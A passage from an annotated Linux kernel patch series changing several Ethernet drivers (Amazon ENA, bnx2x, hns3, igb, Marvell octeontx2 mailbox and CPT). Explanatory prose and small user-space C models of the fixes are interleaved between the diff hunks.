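#define MT753X_BPDU_PORT_FW_MASK	GENMASK(2, 0)

#define MT7530_VLAN_EG_UNTAGGED		4
#define MT753X_BPDU_CPU_ONLY		6	/* value assumed for the demo */

int main(void)
{
	uint32_t mask = MT753X_PAE_EG_TAG_MASK | MT753X_PAE_PORT_FW_MASK |
			MT753X_BPDU_EG_TAG_MASK | MT753X_BPDU_PORT_FW_MASK;
	uint32_t val = FIELD_PREP(MT753X_PAE_EG_TAG_MASK, MT7530_VLAN_EG_UNTAGGED) |
		       FIELD_PREP(MT753X_PAE_PORT_FW_MASK, MT753X_BPDU_CPU_ONLY) |
		       FIELD_PREP(MT753X_BPDU_EG_TAG_MASK, MT7530_VLAN_EG_UNTAGGED) |
		       MT753X_BPDU_CPU_ONLY;	/* lowest field needs no shift */
	uint32_t reg = 0xffffffff;	/* pretend current MT753X_BPC contents */

	reg = (reg & ~mask) | val;	/* the read-modify-write mt7530_rmw() does */
	printf("BPC <- 0x%08x\n", reg);
	return 0;
}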
+diff --git a/drivers/net/ethernet/amazon/ena/ena_netdev.c b/drivers/net/ethernet/amazon/ena/ena_netdev.c
+index 044b8afde69a0..9e82e7b9c3b72 100644
+--- a/drivers/net/ethernet/amazon/ena/ena_netdev.c
++++ b/drivers/net/ethernet/amazon/ena/ena_netdev.c
+@@ -3174,22 +3174,6 @@ static netdev_tx_t ena_start_xmit(struct sk_buff *skb, struct net_device *dev)
+ 	return NETDEV_TX_OK;
+ }
+ 
+-static u16 ena_select_queue(struct net_device *dev, struct sk_buff *skb,
+-			    struct net_device *sb_dev)
+-{
+-	u16 qid;
+-	/* we suspect that this is good for in--kernel network services that
+-	 * want to loop incoming skb rx to tx in normal user generated traffic,
+-	 * most probably we will not get to this
+-	 */
+-	if (skb_rx_queue_recorded(skb))
+-		qid = skb_get_rx_queue(skb);
+-	else
+-		qid = netdev_pick_tx(dev, skb, NULL);
+-
+-	return qid;
+-}
+-
+ static void ena_config_host_info(struct ena_com_dev *ena_dev, struct pci_dev *pdev)
+ {
+ 	struct device *dev = &pdev->dev;
+@@ -3359,7 +3343,6 @@ static const struct net_device_ops ena_netdev_ops = {
+ 	.ndo_open		= ena_open,
+ 	.ndo_stop		= ena_close,
+ 	.ndo_start_xmit		= ena_start_xmit,
+-	.ndo_select_queue	= ena_select_queue,
+ 	.ndo_get_stats64	= ena_get_stats64,
+ 	.ndo_tx_timeout		= ena_tx_timeout,
+ 	.ndo_change_mtu		= ena_change_mtu,
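Dropping .ndo_select_queue here hands queue selection back to the netdev
core. A user-space model of why the removed hook was redundant, assuming
mainline skb_tx_hash() behaviour: the default picker also reuses a recorded
rx queue, but reduces it against the real Tx queue count instead of
trusting it blindly:

#include <stdio.h>

/* Toy model of the core's fallback; the modulo stands in for the
 * clamping in skb_tx_hash(), and 0 stands in for the hash-based path
 * taken when no rx queue was recorded.
 */
static unsigned int pick_tx_queue(int rx_recorded, unsigned int rx_queue,
				  unsigned int num_tx_queues)
{
	if (rx_recorded)
		return rx_queue % num_tx_queues;	/* never out of range */
	return 0;
}

int main(void)
{
	/* rx queue 12 recorded, but only 8 Tx queues configured */
	printf("tx queue = %u\n", pick_tx_queue(1, 12, 8));	/* -> 4 */
	return 0;
}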
+diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.h b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.h
+index d8b1824c334d3..0bc1367fd6492 100644
+--- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.h
++++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.h
+@@ -1002,9 +1002,6 @@ static inline void bnx2x_set_fw_mac_addr(__le16 *fw_hi, __le16 *fw_mid,
+ static inline void bnx2x_free_rx_mem_pool(struct bnx2x *bp,
+ 					  struct bnx2x_alloc_pool *pool)
+ {
+-	if (!pool->page)
+-		return;
+-
+ 	put_page(pool->page);
+ 
+ 	pool->page = NULL;
+@@ -1015,6 +1012,9 @@ static inline void bnx2x_free_rx_sge_range(struct bnx2x *bp,
+ {
+ 	int i;
+ 
++	if (!fp->page_pool.page)
++		return;
++
+ 	if (fp->mode == TPA_MODE_DISABLED)
+ 		return;
+ 
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3_dcbnl.c b/drivers/net/ethernet/hisilicon/hns3/hns3_dcbnl.c
+index 3b6dbf158b98d..f72dc0cee30e5 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3_dcbnl.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3_dcbnl.c
+@@ -76,7 +76,7 @@ static int hns3_dcbnl_ieee_delapp(struct net_device *ndev, struct dcb_app *app)
+ 	if (hns3_nic_resetting(ndev))
+ 		return -EBUSY;
+ 
+-	if (h->kinfo.dcb_ops->ieee_setapp)
++	if (h->kinfo.dcb_ops->ieee_delapp)
+ 		return h->kinfo.dcb_ops->ieee_delapp(h, app);
+ 
+ 	return -EOPNOTSUPP;
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
+index 48b0cb5ec5d29..27037ce795902 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
+@@ -2990,7 +2990,10 @@ static int hclge_mac_init(struct hclge_dev *hdev)
+ 	int ret;
+ 
+ 	hdev->support_sfp_query = true;
+-	hdev->hw.mac.duplex = HCLGE_MAC_FULL;
++
++	if (!test_bit(HCLGE_STATE_RST_HANDLING, &hdev->state))
++		hdev->hw.mac.duplex = HCLGE_MAC_FULL;
++
+ 	ret = hclge_cfg_mac_speed_dup_hw(hdev, hdev->hw.mac.speed,
+ 					 hdev->hw.mac.duplex, hdev->hw.mac.lane_num);
+ 	if (ret)
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_ptp.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_ptp.c
+index a40b1583f1149..0f06f95b09bc2 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_ptp.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_ptp.c
+@@ -120,7 +120,7 @@ void hclge_ptp_get_rx_hwts(struct hnae3_handle *handle, struct sk_buff *skb,
+ 	u64 ns = nsec;
+ 	u32 sec_h;
+ 
+-	if (!test_bit(HCLGE_PTP_FLAG_RX_EN, &hdev->ptp->flags))
++	if (!hdev->ptp || !test_bit(HCLGE_PTP_FLAG_RX_EN, &hdev->ptp->flags))
+ 		return;
+ 
+ 	/* Since the BD does not have enough space for the higher 16 bits of
+diff --git a/drivers/net/ethernet/intel/igb/igb_main.c b/drivers/net/ethernet/intel/igb/igb_main.c
+index 45ce4ed16146e..81d9a5338be5e 100644
+--- a/drivers/net/ethernet/intel/igb/igb_main.c
++++ b/drivers/net/ethernet/intel/igb/igb_main.c
+@@ -6926,44 +6926,31 @@ static void igb_extts(struct igb_adapter *adapter, int tsintr_tt)
+ static void igb_tsync_interrupt(struct igb_adapter *adapter)
+ {
+ 	struct e1000_hw *hw = &adapter->hw;
+-	u32 ack = 0, tsicr = rd32(E1000_TSICR);
++	u32 tsicr = rd32(E1000_TSICR);
+ 	struct ptp_clock_event event;
+ 
+ 	if (tsicr & TSINTR_SYS_WRAP) {
+ 		event.type = PTP_CLOCK_PPS;
+ 		if (adapter->ptp_caps.pps)
+ 			ptp_clock_event(adapter->ptp_clock, &event);
+-		ack |= TSINTR_SYS_WRAP;
+ 	}
+ 
+ 	if (tsicr & E1000_TSICR_TXTS) {
+ 		/* retrieve hardware timestamp */
+ 		schedule_work(&adapter->ptp_tx_work);
+-		ack |= E1000_TSICR_TXTS;
+ 	}
+ 
+-	if (tsicr & TSINTR_TT0) {
++	if (tsicr & TSINTR_TT0)
+ 		igb_perout(adapter, 0);
+-		ack |= TSINTR_TT0;
+-	}
+ 
+-	if (tsicr & TSINTR_TT1) {
++	if (tsicr & TSINTR_TT1)
+ 		igb_perout(adapter, 1);
+-		ack |= TSINTR_TT1;
+-	}
+ 
+-	if (tsicr & TSINTR_AUTT0) {
++	if (tsicr & TSINTR_AUTT0)
+ 		igb_extts(adapter, 0);
+-		ack |= TSINTR_AUTT0;
+-	}
+ 
+-	if (tsicr & TSINTR_AUTT1) {
++	if (tsicr & TSINTR_AUTT1)
+ 		igb_extts(adapter, 1);
+-		ack |= TSINTR_AUTT1;
+-	}
+-
+-	/* acknowledge the interrupts */
+-	wr32(E1000_TSICR, ack);
+ }
+ 
+ static irqreturn_t igb_msix_other(int irq, void *data)
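The igb hunk above stops writing the accumulated ack mask back to TSICR.
Per the rationale assumed here from the upstream fix this backports,
reading TSICR already clears it, so the extra write-1-to-clear could wipe
a cause bit that re-asserted between the read and the write. A user-space
model of that lost-event window, with the register behaviour simulated
rather than taken from real hardware:

#include <stdint.h>
#include <stdio.h>

static uint32_t tsicr;			/* pretend cause register */

static uint32_t read_tsicr(void)	/* read-to-clear, as assumed above */
{
	uint32_t v = tsicr;
	tsicr = 0;
	return v;
}

int main(void)
{
	uint32_t seen;

	tsicr = 0x1;			/* event fires */
	seen = read_tsicr();		/* handler reads, hardware clears */
	tsicr |= 0x1;			/* same event fires again here */
	tsicr &= ~seen;			/* old code: wr32(E1000_TSICR, ack) */
	printf("handled 0x%x, pending now 0x%x (event lost)\n", seen, tsicr);
	return 0;
}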
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/cgx.c b/drivers/net/ethernet/marvell/octeontx2/af/cgx.c
+index 90be87dc105d3..e6fe599f7bf3a 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/cgx.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/cgx.c
+@@ -1346,7 +1346,7 @@ static irqreturn_t cgx_fwi_event_handler(int irq, void *data)
+ 
+ 		/* Release thread waiting for completion  */
+ 		lmac->cmd_pend = false;
+-		wake_up_interruptible(&lmac->wq_cmd_cmplt);
++		wake_up(&lmac->wq_cmd_cmplt);
+ 		break;
+ 	case CGX_EVT_ASYNC:
+ 		if (cgx_event_is_linkevent(event))
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mbox.c b/drivers/net/ethernet/marvell/octeontx2/af/mbox.c
+index 9690ac01f02c8..7d741e3ba8c51 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mbox.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mbox.c
+@@ -214,11 +214,12 @@ int otx2_mbox_busy_poll_for_rsp(struct otx2_mbox *mbox, int devid)
+ }
+ EXPORT_SYMBOL(otx2_mbox_busy_poll_for_rsp);
+ 
+-void otx2_mbox_msg_send(struct otx2_mbox *mbox, int devid)
++static void otx2_mbox_msg_send_data(struct otx2_mbox *mbox, int devid, u64 data)
+ {
+ 	struct otx2_mbox_dev *mdev = &mbox->dev[devid];
+ 	struct mbox_hdr *tx_hdr, *rx_hdr;
+ 	void *hw_mbase = mdev->hwbase;
++	u64 intr_val;
+ 
+ 	tx_hdr = hw_mbase + mbox->tx_start;
+ 	rx_hdr = hw_mbase + mbox->rx_start;
+@@ -254,14 +255,52 @@ void otx2_mbox_msg_send(struct otx2_mbox *mbox, int devid)
+ 
+ 	spin_unlock(&mdev->mbox_lock);
+ 
++	/* Check if interrupt pending */
++	intr_val = readq((void __iomem *)mbox->reg_base +
++		     (mbox->trigger | (devid << mbox->tr_shift)));
++
++	intr_val |= data;
+ 	/* The interrupt should be fired after num_msgs is written
+ 	 * to the shared memory
+ 	 */
+-	writeq(1, (void __iomem *)mbox->reg_base +
++	writeq(intr_val, (void __iomem *)mbox->reg_base +
+ 	       (mbox->trigger | (devid << mbox->tr_shift)));
+ }
++
++void otx2_mbox_msg_send(struct otx2_mbox *mbox, int devid)
++{
++	otx2_mbox_msg_send_data(mbox, devid, MBOX_DOWN_MSG);
++}
+ EXPORT_SYMBOL(otx2_mbox_msg_send);
+ 
++void otx2_mbox_msg_send_up(struct otx2_mbox *mbox, int devid)
++{
++	otx2_mbox_msg_send_data(mbox, devid, MBOX_UP_MSG);
++}
++EXPORT_SYMBOL(otx2_mbox_msg_send_up);
++
++bool otx2_mbox_wait_for_zero(struct otx2_mbox *mbox, int devid)
++{
++	u64 data;
++
++	data = readq((void __iomem *)mbox->reg_base +
++		     (mbox->trigger | (devid << mbox->tr_shift)));
++
++	/* If data is non-zero wait for ~1ms and return to caller
++	 * whether data has changed to zero or not after the wait.
++	 */
++	if (!data)
++		return true;
++
++	usleep_range(950, 1000);
++
++	data = readq((void __iomem *)mbox->reg_base +
++		     (mbox->trigger | (devid << mbox->tr_shift)));
++
++	return data == 0;
++}
++EXPORT_SYMBOL(otx2_mbox_wait_for_zero);
++
+ struct mbox_msghdr *otx2_mbox_alloc_msg_rsp(struct otx2_mbox *mbox, int devid,
+ 					    int size, int size_rsp)
+ {
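The rewritten send path turns the trigger register into a tiny two-bit
doorbell protocol: MBOX_DOWN_MSG and MBOX_UP_MSG share one word, each
sender ORs its own bit on top of whatever is already pending, and
otx2_mbox_wait_for_zero() lets a sender poll for the peer to drain its bit
first. A user-space sketch of the invariant this buys (a down doorbell can
no longer overwrite a pending up doorbell), with values mirroring the
mbox.h hunk below:

#include <stdint.h>
#include <stdio.h>

#define MBOX_DOWN_MSG 1
#define MBOX_UP_MSG   2

static uint64_t trigger;	/* stand-in for the shared trigger register */

static void ring(uint64_t bit)
{
	trigger |= bit;		/* readq() + OR + writeq() in the driver */
}

static void ack(uint64_t bit)
{
	trigger &= ~bit;	/* receiver clears only the bit it handled */
}

int main(void)
{
	ring(MBOX_UP_MSG);	/* AF notifies PF */
	ring(MBOX_DOWN_MSG);	/* PF request lands in the same window */
	ack(MBOX_DOWN_MSG);	/* down path done; up doorbell survives */
	printf("still pending = 0x%llx\n", (unsigned long long)trigger);
	return 0;
}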
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mbox.h b/drivers/net/ethernet/marvell/octeontx2/af/mbox.h
+index 03ebabd616353..be70269e91684 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mbox.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mbox.h
+@@ -16,6 +16,9 @@
+ 
+ #define MBOX_SIZE		SZ_64K
+ 
++#define MBOX_DOWN_MSG		1
++#define MBOX_UP_MSG		2
++
+ /* AF/PF: PF initiated, PF/VF VF initiated */
+ #define MBOX_DOWN_RX_START	0
+ #define MBOX_DOWN_RX_SIZE	(46 * SZ_1K)
+@@ -101,6 +104,7 @@ int otx2_mbox_regions_init(struct otx2_mbox *mbox, void __force **hwbase,
+ 			   struct pci_dev *pdev, void __force *reg_base,
+ 			   int direction, int ndevs, unsigned long *bmap);
+ void otx2_mbox_msg_send(struct otx2_mbox *mbox, int devid);
++void otx2_mbox_msg_send_up(struct otx2_mbox *mbox, int devid);
+ int otx2_mbox_wait_for_rsp(struct otx2_mbox *mbox, int devid);
+ int otx2_mbox_busy_poll_for_rsp(struct otx2_mbox *mbox, int devid);
+ struct mbox_msghdr *otx2_mbox_alloc_msg_rsp(struct otx2_mbox *mbox, int devid,
+@@ -118,6 +122,8 @@ static inline struct mbox_msghdr *otx2_mbox_alloc_msg(struct otx2_mbox *mbox,
+ 	return otx2_mbox_alloc_msg_rsp(mbox, devid, size, 0);
+ }
+ 
++bool otx2_mbox_wait_for_zero(struct otx2_mbox *mbox, int devid);
++
+ /* Mailbox message types */
+ #define MBOX_MSG_MASK				0xFFFF
+ #define MBOX_MSG_INVALID			0xFFFE
+@@ -196,6 +202,9 @@ M(CPT_STATS,            0xA05, cpt_sts, cpt_sts_req, cpt_sts_rsp)	\
+ M(CPT_RXC_TIME_CFG,     0xA06, cpt_rxc_time_cfg, cpt_rxc_time_cfg_req,  \
+ 			       msg_rsp)                                 \
+ M(CPT_CTX_CACHE_SYNC,   0xA07, cpt_ctx_cache_sync, msg_req, msg_rsp)    \
++M(CPT_LF_RESET,         0xA08, cpt_lf_reset, cpt_lf_rst_req, msg_rsp)	\
++M(CPT_FLT_ENG_INFO,     0xA09, cpt_flt_eng_info, cpt_flt_eng_info_req,	\
++			       cpt_flt_eng_info_rsp)			\
+ /* SDP mbox IDs (range 0x1000 - 0x11FF) */				\
+ M(SET_SDP_CHAN_INFO, 0x1000, set_sdp_chan_info, sdp_chan_info_msg, msg_rsp) \
+ M(GET_SDP_CHAN_INFO, 0x1001, get_sdp_chan_info, msg_req, sdp_get_chan_info_msg) \
+@@ -1702,6 +1711,28 @@ struct cpt_inst_lmtst_req {
+ 	u64 rsvd;
+ };
+ 
++/* Mailbox message format to request for CPT LF reset */
++struct cpt_lf_rst_req {
++	struct mbox_msghdr hdr;
++	u32 slot;
++	u32 rsvd;
++};
++
++/* Mailbox message format to request for CPT faulted engines */
++struct cpt_flt_eng_info_req {
++	struct mbox_msghdr hdr;
++	int blkaddr;
++	bool reset;
++	u32 rsvd;
++};
++
++struct cpt_flt_eng_info_rsp {
++	struct mbox_msghdr hdr;
++	u64 flt_eng_map[CPT_10K_AF_INT_VEC_RVU];
++	u64 rcvrd_eng_map[CPT_10K_AF_INT_VEC_RVU];
++	u64 rsvd;
++};
++
+ struct sdp_node_info {
+ 	/* Node to which this PF belons to */
+ 	u8 node_id;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mcs_rvu_if.c b/drivers/net/ethernet/marvell/octeontx2/af/mcs_rvu_if.c
+index dfd23580e3b8e..d39d86e694ccf 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mcs_rvu_if.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mcs_rvu_if.c
+@@ -121,13 +121,17 @@ int mcs_add_intr_wq_entry(struct mcs *mcs, struct mcs_intr_event *event)
+ static int mcs_notify_pfvf(struct mcs_intr_event *event, struct rvu *rvu)
+ {
+ 	struct mcs_intr_info *req;
+-	int err, pf;
++	int pf;
+ 
+ 	pf = rvu_get_pf(event->pcifunc);
+ 
++	mutex_lock(&rvu->mbox_lock);
++
+ 	req = otx2_mbox_alloc_msg_mcs_intr_notify(rvu, pf);
+-	if (!req)
++	if (!req) {
++		mutex_unlock(&rvu->mbox_lock);
+ 		return -ENOMEM;
++	}
+ 
+ 	req->mcs_id = event->mcs_id;
+ 	req->intr_mask = event->intr_mask;
+@@ -135,10 +139,11 @@ static int mcs_notify_pfvf(struct mcs_intr_event *event, struct rvu *rvu)
+ 	req->hdr.pcifunc = event->pcifunc;
+ 	req->lmac_id = event->lmac_id;
+ 
+-	otx2_mbox_msg_send(&rvu->afpf_wq_info.mbox_up, pf);
+-	err = otx2_mbox_wait_for_rsp(&rvu->afpf_wq_info.mbox_up, pf);
+-	if (err)
+-		dev_warn(rvu->dev, "MCS notification to pf %d failed\n", pf);
++	otx2_mbox_wait_for_zero(&rvu->afpf_wq_info.mbox_up, pf);
++
++	otx2_mbox_msg_send_up(&rvu->afpf_wq_info.mbox_up, pf);
++
++	mutex_unlock(&rvu->mbox_lock);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu.c
+index d88d86bf07b03..a7034b47ed6c9 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu.c
+@@ -1164,8 +1164,16 @@ static int rvu_setup_hw_resources(struct rvu *rvu)
+ 		goto nix_err;
+ 	}
+ 
++	err = rvu_cpt_init(rvu);
++	if (err) {
++		dev_err(rvu->dev, "%s: Failed to initialize cpt\n", __func__);
++		goto mcs_err;
++	}
++
+ 	return 0;
+ 
++mcs_err:
++	rvu_mcs_exit(rvu);
+ nix_err:
+ 	rvu_nix_freemem(rvu);
+ npa_err:
+@@ -2106,7 +2114,7 @@ MBOX_MESSAGES
+ 	}
+ }
+ 
+-static void __rvu_mbox_handler(struct rvu_work *mwork, int type)
++static void __rvu_mbox_handler(struct rvu_work *mwork, int type, bool poll)
+ {
+ 	struct rvu *rvu = mwork->rvu;
+ 	int offset, err, id, devid;
+@@ -2173,6 +2181,9 @@ static void __rvu_mbox_handler(struct rvu_work *mwork, int type)
+ 	}
+ 	mw->mbox_wrk[devid].num_msgs = 0;
+ 
++	if (poll)
++		otx2_mbox_wait_for_zero(mbox, devid);
++
+ 	/* Send mbox responses to VF/PF */
+ 	otx2_mbox_msg_send(mbox, devid);
+ }
+@@ -2180,15 +2191,18 @@ static void __rvu_mbox_handler(struct rvu_work *mwork, int type)
+ static inline void rvu_afpf_mbox_handler(struct work_struct *work)
+ {
+ 	struct rvu_work *mwork = container_of(work, struct rvu_work, work);
++	struct rvu *rvu = mwork->rvu;
+ 
+-	__rvu_mbox_handler(mwork, TYPE_AFPF);
++	mutex_lock(&rvu->mbox_lock);
++	__rvu_mbox_handler(mwork, TYPE_AFPF, true);
++	mutex_unlock(&rvu->mbox_lock);
+ }
+ 
+ static inline void rvu_afvf_mbox_handler(struct work_struct *work)
+ {
+ 	struct rvu_work *mwork = container_of(work, struct rvu_work, work);
+ 
+-	__rvu_mbox_handler(mwork, TYPE_AFVF);
++	__rvu_mbox_handler(mwork, TYPE_AFVF, false);
+ }
+ 
+ static void __rvu_mbox_up_handler(struct rvu_work *mwork, int type)
+@@ -2363,6 +2377,8 @@ static int rvu_mbox_init(struct rvu *rvu, struct mbox_wq_info *mw,
+ 		}
+ 	}
+ 
++	mutex_init(&rvu->mbox_lock);
++
+ 	mbox_regions = kcalloc(num, sizeof(void *), GFP_KERNEL);
+ 	if (!mbox_regions) {
+ 		err = -ENOMEM;
+@@ -2512,10 +2528,9 @@ static void rvu_queue_work(struct mbox_wq_info *mw, int first,
+ 	}
+ }
+ 
+-static irqreturn_t rvu_mbox_intr_handler(int irq, void *rvu_irq)
++static irqreturn_t rvu_mbox_pf_intr_handler(int irq, void *rvu_irq)
+ {
+ 	struct rvu *rvu = (struct rvu *)rvu_irq;
+-	int vfs = rvu->vfs;
+ 	u64 intr;
+ 
+ 	intr = rvu_read64(rvu, BLKADDR_RVUM, RVU_AF_PFAF_MBOX_INT);
+@@ -2529,6 +2544,18 @@ static irqreturn_t rvu_mbox_intr_handler(int irq, void *rvu_irq)
+ 
+ 	rvu_queue_work(&rvu->afpf_wq_info, 0, rvu->hw->total_pfs, intr);
+ 
++	return IRQ_HANDLED;
++}
++
++static irqreturn_t rvu_mbox_intr_handler(int irq, void *rvu_irq)
++{
++	struct rvu *rvu = (struct rvu *)rvu_irq;
++	int vfs = rvu->vfs;
++	u64 intr;
++
++	/* Sync with mbox memory region */
++	rmb();
++
+ 	/* Handle VF interrupts */
+ 	if (vfs > 64) {
+ 		intr = rvupf_read64(rvu, RVU_PF_VFPF_MBOX_INTX(1));
+@@ -2865,7 +2892,7 @@ static int rvu_register_interrupts(struct rvu *rvu)
+ 	/* Register mailbox interrupt handler */
+ 	sprintf(&rvu->irq_name[RVU_AF_INT_VEC_MBOX * NAME_SIZE], "RVUAF Mbox");
+ 	ret = request_irq(pci_irq_vector(rvu->pdev, RVU_AF_INT_VEC_MBOX),
+-			  rvu_mbox_intr_handler, 0,
++			  rvu_mbox_pf_intr_handler, 0,
+ 			  &rvu->irq_name[RVU_AF_INT_VEC_MBOX * NAME_SIZE], rvu);
+ 	if (ret) {
+ 		dev_err(rvu->dev,
+@@ -3039,9 +3066,8 @@ static int rvu_flr_init(struct rvu *rvu)
+ 			    cfg | BIT_ULL(22));
+ 	}
+ 
+-	rvu->flr_wq = alloc_workqueue("rvu_afpf_flr",
+-				      WQ_UNBOUND | WQ_HIGHPRI | WQ_MEM_RECLAIM,
+-				       1);
++	rvu->flr_wq = alloc_ordered_workqueue("rvu_afpf_flr",
++					      WQ_HIGHPRI | WQ_MEM_RECLAIM);
+ 	if (!rvu->flr_wq)
+ 		return -ENOMEM;
+ 
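This hunk, like several below in the otx2 PF/VF drivers, converts an
unbound workqueue with max_active == 1 into an explicitly ordered one. The
before/after shape of the conversion, with flags as in the hunk; the
ordered variant states the one-work-item-at-a-time guarantee directly
instead of implying it through max_active:

struct workqueue_struct *wq;

/* before: ordering only implied by the trailing max_active == 1 */
wq = alloc_workqueue("rvu_afpf_flr",
		     WQ_UNBOUND | WQ_HIGHPRI | WQ_MEM_RECLAIM, 1);

/* after: same behaviour, explicit ordering */
wq = alloc_ordered_workqueue("rvu_afpf_flr",
			     WQ_HIGHPRI | WQ_MEM_RECLAIM);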
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu.h b/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
+index 0b76dfa979d4e..a3ae21398ca74 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
+@@ -109,6 +109,8 @@ struct rvu_block {
+ 	u64  lfreset_reg;
+ 	unsigned char name[NAME_SIZE];
+ 	struct rvu *rvu;
++	u64 cpt_flt_eng_map[3];
++	u64 cpt_rcvrd_eng_map[3];
+ };
+ 
+ struct nix_mcast {
+@@ -506,6 +508,7 @@ struct rvu {
+ 	struct ptp		*ptp;
+ 
+ 	int			mcs_blk_cnt;
++	int			cpt_pf_num;
+ 
+ #ifdef CONFIG_DEBUG_FS
+ 	struct rvu_debugfs	rvu_dbg;
+@@ -520,6 +523,10 @@ struct rvu {
+ 	struct list_head	mcs_intrq_head;
+ 	/* mcs interrupt queue lock */
+ 	spinlock_t		mcs_intrq_lock;
++	/* CPT interrupt lock */
++	spinlock_t		cpt_intr_lock;
++
++	struct mutex		mbox_lock; /* Serialize mbox up and down msgs */
+ };
+ 
+ static inline void rvu_write64(struct rvu *rvu, u64 block, u64 offset, u64 val)
+@@ -872,6 +879,7 @@ void rvu_cpt_unregister_interrupts(struct rvu *rvu);
+ int rvu_cpt_lf_teardown(struct rvu *rvu, u16 pcifunc, int blkaddr, int lf,
+ 			int slot);
+ int rvu_cpt_ctx_flush(struct rvu *rvu, u16 pcifunc);
++int rvu_cpt_init(struct rvu *rvu);
+ 
+ #define NDC_AF_BANK_MASK       GENMASK_ULL(7, 0)
+ #define NDC_AF_BANK_LINE_MASK  GENMASK_ULL(31, 16)
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_cgx.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_cgx.c
+index bcb4385d0621c..d1e6b12ecfa70 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_cgx.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_cgx.c
+@@ -232,7 +232,7 @@ static void cgx_notify_pfs(struct cgx_link_event *event, struct rvu *rvu)
+ 	struct cgx_link_user_info *linfo;
+ 	struct cgx_link_info_msg *msg;
+ 	unsigned long pfmap;
+-	int err, pfid;
++	int pfid;
+ 
+ 	linfo = &event->link_uinfo;
+ 	pfmap = cgxlmac_to_pfmap(rvu, event->cgx_id, event->lmac_id);
+@@ -250,16 +250,22 @@ static void cgx_notify_pfs(struct cgx_link_event *event, struct rvu *rvu)
+ 			continue;
+ 		}
+ 
++		mutex_lock(&rvu->mbox_lock);
++
+ 		/* Send mbox message to PF */
+ 		msg = otx2_mbox_alloc_msg_cgx_link_event(rvu, pfid);
+-		if (!msg)
++		if (!msg) {
++			mutex_unlock(&rvu->mbox_lock);
+ 			continue;
++		}
++
+ 		msg->link_info = *linfo;
+-		otx2_mbox_msg_send(&rvu->afpf_wq_info.mbox_up, pfid);
+-		err = otx2_mbox_wait_for_rsp(&rvu->afpf_wq_info.mbox_up, pfid);
+-		if (err)
+-			dev_warn(rvu->dev, "notification to pf %d failed\n",
+-				 pfid);
++
++		otx2_mbox_wait_for_zero(&rvu->afpf_wq_info.mbox_up, pfid);
++
++		otx2_mbox_msg_send_up(&rvu->afpf_wq_info.mbox_up, pfid);
++
++		mutex_unlock(&rvu->mbox_lock);
+ 	} while (pfmap);
+ }
+ 
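Both notification paths touched above (mcs_notify_pfvf() and
cgx_notify_pfs()) converge on the same shape: take the new mbox_lock so up
and down traffic cannot interleave, wait for the previous up doorbell to
drain, then send without blocking on a response. A trimmed sketch of that
pattern; the alloc helper name is hypothetical (the real ones are
generated per message type), everything else is the driver's API:

static int rvu_send_up_notification(struct rvu *rvu, int pf)
{
	struct msg_req *req;

	mutex_lock(&rvu->mbox_lock);		/* serialize up vs. down */

	req = otx2_mbox_alloc_msg_notify(rvu, pf);	/* hypothetical name */
	if (!req) {
		mutex_unlock(&rvu->mbox_lock);
		return -ENOMEM;
	}

	/* ... fill in the request fields ... */

	/* let the PF drain the previous up message before ringing again */
	otx2_mbox_wait_for_zero(&rvu->afpf_wq_info.mbox_up, pf);
	otx2_mbox_msg_send_up(&rvu->afpf_wq_info.mbox_up, pf);

	mutex_unlock(&rvu->mbox_lock);
	return 0;
}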
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_cpt.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_cpt.c
+index 38bbae5d9ae05..6fb02b93c1718 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_cpt.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_cpt.c
+@@ -37,34 +37,68 @@
+ 	(_rsp)->free_sts_##etype = free_sts;                        \
+ })
+ 
+-static irqreturn_t rvu_cpt_af_flt_intr_handler(int irq, void *ptr)
++static irqreturn_t cpt_af_flt_intr_handler(int vec, void *ptr)
+ {
+ 	struct rvu_block *block = ptr;
+ 	struct rvu *rvu = block->rvu;
+ 	int blkaddr = block->addr;
+-	u64 reg0, reg1, reg2;
+-
+-	reg0 = rvu_read64(rvu, blkaddr, CPT_AF_FLTX_INT(0));
+-	reg1 = rvu_read64(rvu, blkaddr, CPT_AF_FLTX_INT(1));
